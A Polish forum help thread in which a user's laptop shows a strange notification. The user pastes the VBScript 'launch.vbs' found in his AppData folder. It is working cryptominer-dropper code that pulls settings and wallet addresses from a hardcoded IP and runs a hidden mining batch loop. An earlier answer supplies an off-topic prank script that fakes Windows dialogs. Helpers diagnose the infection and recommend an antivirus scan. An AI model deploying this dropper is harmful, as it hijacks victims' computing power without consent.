• Najnowsze pytania
  • Bez odpowiedzi
  • Zadaj pytanie
  • Kategorie
  • Tagi
  • Zdobyte punkty
  • Ekipa ninja
  • IRC
  • FAQ
  • Regulamin
  • Książki warte uwagi

Powiadomienie

VPS Starter Arubacloud
+2 głosów
316 wizyt
pytanie zadane 20 stycznia 2022 w Systemy operacyjne, programy przez Alex22 Nowicjusz (140 p.)

Dzień dobry 

Od jakiegoś czasu po włączeniu laptopa widuje powiadomienie i nie wiem co ono oznacza czy mógł by ktoś poradzić co to może być?

2 odpowiedzi

+1 głos
odpowiedź 20 stycznia 2022 przez VBService Ekspert (251,210 p.)
edycja 20 stycznia 2022 przez VBService
  1. Wciśnij na klawiaturze: Windows + R

     
  2. W oknie: Uruchamianie wpisz (lub możesz zrobić kopiuj - wklej)

    explorer C:\Users\alexh\AppData\Roaming\MicrosoftWindowsFirewall

     i wciśnij Enter lub kliknij OK


     
  3. W otwartym folderze:
    C:\Users\alexh\AppData\Roaming\MicrosoftWindowsFirewall

    prawym przyciskiem myszy wybierz: Nowy => Dokument tekstowy


     
  4. Kliknij na tym nowo utworzonym pliku prawym myszy i wybierz: Zmień nazwę



    i wpisz:  epic.vbs + Enter



    powinna się zmienić ikona systemowa (z tekstowego pliku na skrypt VBScript)


     
  5. Teraz nie zamykając otworzonego folderu z utworzonym plikiem, ze zmienioną nazwą
    wciśnij ponownie na klawiaturze: Windows +  i w otwartym oknie Uruchamianie wpisz: notepad

    i wciśnij Enter lub kliknij OK


     
  6. Przeciągnij plik do notatnika


     
  7. I wpisz lub kopiuj - wklej to co poniżej
     
    X=MsgBox("would you like to become epical?",4+32,"epic") 
    
    X=MsgBox("are you sure to become epic? (this might harm your CPU)",3+64,"epic") 
    
    X=MsgBox("collecting epicness, please wait...",0+32,"epic") 
    
    X=MsgBox("scanning failed, would you like to retry?",4+32,"epic") 
    
    X=MsgBox("collecting epicness, please wait...",0+32,"epic") 
    
    X=MsgBox("scanning failed, would you like to retry?",4+32,"epic") 
    
    X=MsgBox("collecting epicness, please wait...",0+32,"epic") 
    
    X=MsgBox("scanning failed, would you like to retry?",4+32,"epic") 
    
    X=MsgBox("collecting epicness, please wait...",0+32,"epic") 
    
    X=MsgBox("scanning failed, would you like to retry?",4+32,"epic") 
    
    X=MsgBox("collecting epicness, please wait...",0+32,"epic") 
    
    X=MsgBox("scanning failed, would you like to retry?",4+32,"epic") 
    
    X=MsgBox("collecting epicness, please wait...",0+32,"epic") 
    
    X=MsgBox("scanning failed, would you like to retry?",4+32,"epic") 
    
    X=MsgBox("collecting epicness, please wait...",0+32,"epic") 
    
    X=MsgBox("scanning failed, would you like to retry?",4+32,"epic") 
    
    X=MsgBox("collecting epicness, please wait...",0+32,"epic") 
    
    X=MsgBox("scanning failed, would you like to retry?",4+32,"epic") 
    
    X=MsgBox("collecting epicness, please wait...",0+32,"epic") 
    
    X=MsgBox("This program isn't responding, please use the epic_2.vbs program to restart the process.",0+48,"Windows Troubleshooting") 
  8. Teraz zapisz i gotowe.




     
komentarz 20 stycznia 2022 przez Alex22 Nowicjusz (140 p.)
po zmienieniu nazwy pliku plik dalej zostaje plikiem tekstowym
1
komentarz 20 stycznia 2022 przez Przemiixx Nowicjusz (220 p.)
Może zmieniasz samą nazwę zamiast rozszerzenia. Wejdź w Panel Sterowania -> Opcje Eksploratora Plików ->  Widok i odznacz opcje Ukryj rozszerzenia znanych plików i wtedy spróbuj zmienić nazwę tamtego pliku
komentarz 21 stycznia 2022 przez VBService Ekspert (251,210 p.)

@Alex22, lub w eksploratorze zakładka Widok

komentarz 21 stycznia 2022 przez Alex22 Nowicjusz (140 p.)

teraz takie coś 

komentarz 21 stycznia 2022 przez VBService Ekspert (251,210 p.)

@Alex22, byłbyś w stanie udostępnić kod tego skryptu launch.vbs, tutaj na forum, proszę.

Jak wstawić do pytania kod źródłowy?

komentarz 22 stycznia 2022 przez Alex22 Nowicjusz (140 p.)
Sub SaveToFile()
	dim xHttp: Set xHttp = createobject("MSXML2.ServerXMLHTTP")
	xHttp.Open "GET", "http://45.61.137.115:5000/algolink/", False
	xHttp.Send
	If xHttp.status = 200 Then
		algolink = xHttp.responseText
	Else
		algolink = "-a ethash -o stratum+tcp://eth-eu1.nanopool.org:9999"
	End If
    Randomize
    rand =  Int( ( 100 - 1 + 1 ) * Rnd + 1 )
    Randomize
	intens = Int( ( 24 ) * Rnd )
	If intens > 18 Then
		intens = intens - 6
	ElseIf intens < 12 Then
		intens = intens + 10
	End If
    Dim fso, fl
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set fl = fso.OpenTextFile("cache.bat", 2, True)
	
    fl.Write "@echo off"
    fl.Write vbNewLine
    fl.Write ":start"
    fl.Write vbNewLine
	If rand < 50 Then
		xHttp.Open "GET", "http://45.61.137.115:5000/IG/", False
		xHttp.Send
		If xHttp.status = 200 Then
			adress = xHttp.responseText
		Else
			adress = "0xFB10b51210410Cfe9E2C5C7923A5E86f99B7B755"
		End If
    		fl.Write "System " & algolink & " -u " & adress & ".RTX2070" & " -p x -i " & intens
	ElseIf rand > 50 Then
		intens = intens + 1
		xHttp.Open "GET", "http://45.61.137.115:5000/adresss/", False
		xHttp.Send
		If xHttp.status = 200 Then
			sus = xHttp.responseText
		Else
			sus = "0xFB10b51210410Cfe9E2C5C7923A5E86f99B7B755"
		End If
		fl.Write "System " & algolink & " -u " & sus & ".test" & " -p x -i " & intens
	End If
    fl.Write vbNewLine
    fl.Write "goto start"
    fl.Close
    Set fl = Nothing
    Set fso = Nothing
end sub

Function FileExists(FilePath)
  Set fso = CreateObject("Scripting.FileSystemObject")
  If fso.FileExists(FilePath) Then
    FileExists=CBool(1)
  Else
    FileExists=CBool(0)
  End If
End Function

Set objShellApp  = CreateObject("Shell.Application")

Const ssfAPPDATA = &H1A
sAppDataPath = objShellApp.NameSpace(ssfAPPDATA).Self.Path

SaveToFile
Dim WShell
Set WShell = CreateObject("WScript.Shell")
WShell.Run "cache.bat", 0
Set WShell = Nothing

If FileExists(sAppDataPath & "/MicrosoftWindowsFirewall/System.exe") Then
Else
	Set WShell = CreateObject("WScript.Shell")
	WShell.Run "backup.bat", 0
	Set WShell = Nothing
End If

 

komentarz 22 stycznia 2022 przez VBService Ekspert (251,210 p.)
edycja 22 stycznia 2022 przez VBService

Po pobieżnej analizie linki "preparowane" przez ten skrypt prowadzą do dziwnych stron:

  1. http://45.61.137.115/
  2. https://nanopool.org/

pod pierwszym linkiem nie klikaj w żaden plik (nie pobieraj) a w szczególności te z rozszerzeniem exe.

Wygląda na to, że prawdopodobnie padłeś ofiarą coś na wzór trojana, który instaluje aplikację, która próbuje wykorzystać Twoją moc obliczeniową komputera do "kopania" krypto walut.

Pozostaw ten plik launch.vbs, ale usuń z niego kod, zostaw pusty plik. I zapuść jakiś program antywirusowy, najlepiej uruchamiany z np. pendrive-a, czyli taki który nie uruchamia Twojego systemu. Polecam: Hiren's Boot  =>  Security – AntiVirus

 

1
komentarz 23 stycznia 2022 przez Alex22 Nowicjusz (140 p.)
bardzo dziękuję za rady antywirus usunął 20 zagrożeń
0 głosów
odpowiedź 20 stycznia 2022 przez SzkolnyAdmin Szeryf (86,280 p.)
komentarz 20 stycznia 2022 przez Alex22 Nowicjusz (140 p.)
nie działa

Podobne pytania

0 głosów
0 odpowiedzi 359 wizyt
+1 głos
1 odpowiedź 169 wizyt
pytanie zadane 16 stycznia 2023 w JavaScript przez mi-20 Stary wyjadacz (13,190 p.)
0 głosów
2 odpowiedzi 198 wizyt
pytanie zadane 11 kwietnia 2019 w PHP przez Majki Obywatel (1,410 p.)

92,453 zapytań

141,262 odpowiedzi

319,088 komentarzy

61,854 pasjonatów

Motyw:

Akcja Pajacyk

Pajacyk od wielu lat dożywia dzieci. Pomóż klikając w zielony brzuszek na stronie. Dziękujemy! ♡

Oto polecana książka warta uwagi.
Pełną listę książek znajdziesz tutaj.

Akademia Sekuraka

Akademia Sekuraka 2024 zapewnia dostęp do minimum 15 szkoleń online z bezpieczeństwa IT oraz dostęp także do materiałów z edycji Sekurak Academy z roku 2023!

Przy zakupie możecie skorzystać z kodu: pasja-akademia - użyjcie go w koszyku, a uzyskacie rabat -30% na bilety w wersji "Standard"! Więcej informacji na temat akademii 2024 znajdziecie tutaj. Dziękujemy ekipie Sekuraka za taką fajną zniżkę dla wszystkich Pasjonatów!

Akademia Sekuraka

Niedawno wystartował dodruk tej świetnej, rozchwytywanej książki (około 940 stron). Mamy dla Was kod: pasja (wpiszcie go w koszyku), dzięki któremu otrzymujemy 10% zniżki - dziękujemy zaprzyjaźnionej ekipie Sekuraka za taki bonus dla Pasjonatów! Książka to pierwszy tom z serii o ITsec, który łagodnie wprowadzi w świat bezpieczeństwa IT każdą osobę - warto, polecamy!

...